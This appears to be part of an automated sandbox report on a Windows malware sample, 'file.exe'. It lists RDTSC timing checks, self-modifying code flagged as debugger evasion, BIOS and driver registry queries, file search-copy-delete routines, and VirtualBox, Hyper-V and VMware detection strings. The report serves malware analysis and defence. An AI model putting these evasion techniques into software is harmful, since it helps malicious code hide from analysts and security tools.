                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0FA6 second address: 10B0FD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0C5CC1AFD9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0FD9 second address: 10B0FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0C5DBE21D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B12EB second address: 10B1305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0C5CC1AFD4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B82FE second address: 10B8303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8717 second address: 10B871F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B871F second address: 10B872E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 js 00007F0C5DBE21DEh 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8B03 second address: 10B8B28 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C5CC1AFC6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0C5CC1AFD7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8CBA second address: 10B8CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8CC0 second address: 10B8CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8CC4 second address: 10B8CDA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0C5DBE21D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F0C5DBE21D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8CDA second address: 10B8CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8CDE second address: 10B8CED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8CED second address: 10B8D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5CC1AFCFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8D00 second address: 10B8D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B8E6B second address: 10B8EBE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C5CC1AFD8h 0x00000008 jmp 00007F0C5CC1AFD2h 0x0000000d jns 00007F0C5CC1AFC8h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F0C5CC1AFD3h 0x0000001b jmp 00007F0C5CC1AFD8h 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B90AE second address: 10B90C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0C5DBE21DAh 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B90C1 second address: 10B90DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5CC1AFD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9EEE second address: 10B9EFE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C5DBE21D6h 0x00000008 jp 00007F0C5DBE21D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9EFE second address: 10B9F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD895 second address: 10BD899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2CB5 second address: 10C2CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2CBB second address: 10C2CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2E72 second address: 10C2E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0C5CC1AFC6h 0x0000000a jnp 00007F0C5CC1AFC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2E84 second address: 10C2E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2E89 second address: 10C2EAA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C5CC1AFCEh 0x00000008 jo 00007F0C5CC1AFC6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edx 0x00000011 jmp 00007F0C5CC1AFCEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2FD5 second address: 10C2FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0C5DBE21DCh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2FE6 second address: 10C2FED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFD09 second address: 10CFD1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jc 00007F0C5DBE21D6h 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFD1D second address: 10CFD3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5CC1AFD1h 0x00000009 jmp 00007F0C5CC1AFCBh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFD3D second address: 10CFD4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0C5DBE21E2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFD4B second address: 10CFD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CFE84 second address: 10CFE9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D5877 second address: 10D5898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F0C5CC1AFC6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 jno 00007F0C5CC1AFC6h 0x00000016 je 00007F0C5CC1AFC6h 0x0000001c pushad 0x0000001d popad 0x0000001e push edi 0x0000001f pop edi 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D5898 second address: 10D589D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D9F9B second address: 10D9F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D9F9F second address: 10D9FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0C5DBE21E0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D9FB5 second address: 10D9FDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0C5CC1AFD2h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D9FDB second address: 10D9FE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3560 second address: 10E358E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5CC1AFD5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0C5CC1AFD2h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB3BA second address: 10EB3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB9A4 second address: 10EB9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB9AA second address: 10EB9AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB9AE second address: 10EB9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push ebx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF293 second address: 10EF297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF297 second address: 10EF29B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF415 second address: 10EF438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5DBE21E2h 0x00000009 jmp 00007F0C5DBE21DDh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF438 second address: 10EF465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCFh 0x00000007 jmp 00007F0C5CC1AFD2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007F0C5CC1AFD2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0E9C second address: 10F0EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jnc 00007F0C5DBE21D8h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jo 00007F0C5DBE21D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0EB9 second address: 10F0ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0C5CC1AFC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F0C5CC1AFCDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0ED5 second address: 10F0EDB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FE599 second address: 10FE59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B0AB second address: 110B0AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D039 second address: 110D03F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D03F second address: 110D050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F0C5DBE21D6h 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110E6D2 second address: 110E6DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 je 00007F0C5CC1AFC6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EE49 second address: 111EE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EE4D second address: 111EE71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007F0C5CC1AFC6h 0x0000000f jg 00007F0C5CC1AFC6h 0x00000015 pop eax 0x00000016 push eax 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop eax 0x0000001a popad 0x0000001b push ecx 0x0000001c jp 00007F0C5CC1AFCEh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111DDB2 second address: 111DDD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0C5DBE21E8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E20D second address: 111E213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E213 second address: 111E21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0C5DBE21D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E21E second address: 111E240 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C5CC1AFD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c ja 00007F0C5CC1AFC6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFCAE5 second address: FFCAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFCAE9 second address: FFCAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5CC1AFCDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11277BD second address: 11277C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11277C3 second address: 11277CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11277CA second address: 11277E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E3h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11292AB second address: 11292D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F0C5CC1AFD9h 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11292D1 second address: 11292D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11292D6 second address: 11292DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11292DC second address: 11292E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11292E0 second address: 11292E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5770357 second address: 577035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577035B second address: 5770361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57703CB second address: 57703CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57703CF second address: 57703E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57703E0 second address: 57703F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5DBE21DCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57703F0 second address: 57703F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57703F4 second address: 5770433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0C5DBE21E9h 0x00000012 or cx, 8266h 0x00000017 jmp 00007F0C5DBE21E1h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5770433 second address: 5770438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5770438 second address: 577047F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F0C5DBE21E6h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov ecx, 2A53B3BDh 0x00000019 mov dx, si 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577047F second address: 5770483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5770483 second address: 5770487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5770487 second address: 577048D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E917FC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E916CE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 106489D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E91721 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10C677D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C44910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C3DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C3E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C44570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C3ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F68A FindFirstFileA,0_2_00C3F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C43EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C3F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C3BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C3DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C31160 GetSystemInfo,ExitProcess,0_2_00C31160
                Source: file.exe, file.exe, 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2133666234.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133666234.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133666234.0000000001A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2133666234.00000000019BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
